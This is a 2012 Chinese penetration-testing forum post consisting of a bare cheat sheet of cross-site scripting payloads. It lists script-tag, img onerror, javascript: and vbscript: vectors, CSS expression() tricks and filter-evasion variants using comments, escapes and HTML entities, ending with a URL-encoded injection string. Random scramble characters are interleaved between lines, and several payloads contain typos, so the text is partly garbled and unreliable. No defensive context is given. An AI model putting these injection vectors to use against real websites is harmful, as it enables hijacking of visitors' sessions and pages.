中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
9 ^! k: r6 W/ c) C
<img scr=javascript:alert("跨站")></img>
3 Y/ N/ T, c, W
<img scr="javascript: alert(/跨站/)></img>
' I/ ~ u1 C- ?( U2 q+ h+ b$ D
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
9 R' Y3 w/ O2 e- Y1 I- O1 z( p% d
<img scr="#" onerror=alert(/跨站/)></img>
3 I( V' C) @ X
<img scr="#" style="xss:expression(alert(/xss/));"></img>
4 `3 _5 s' M7 O6 w% P
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
% A: Q; ~, G" ^3 }5 ~ u: J
<img src=vbscript:msgbox ("xss")></img>
% d' Z! ^% k6 N
<style> input {left:expression (alert('xss'))}</style>
( }( k% S0 v9 _, }& l3 u
<div style={left:expression (alert('xss'))}></div>
8 k: v9 s/ X6 J& z! ?. v. ]6 ~
<div style={left:exp/* */ression (alert('xss'))}></div>
, l, B* Y% A# w" N8 Z1 |) [- G
<div style={left:\0065\0078ression (alert('xss'))}></div>
f$ \- n# | O. c4 I% [" `) V8 ? [
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' @) f9 D9 J5 q6 L: Z
unicode <div style="{left:expRessioN (alert('xss'))}">
! ?2 t* J: S, V% Z8 |) C) {
% z2 P. X: {5 }5 N" T/ g1 i: ?
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
- S8 T4 H$ t$ o& F" j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2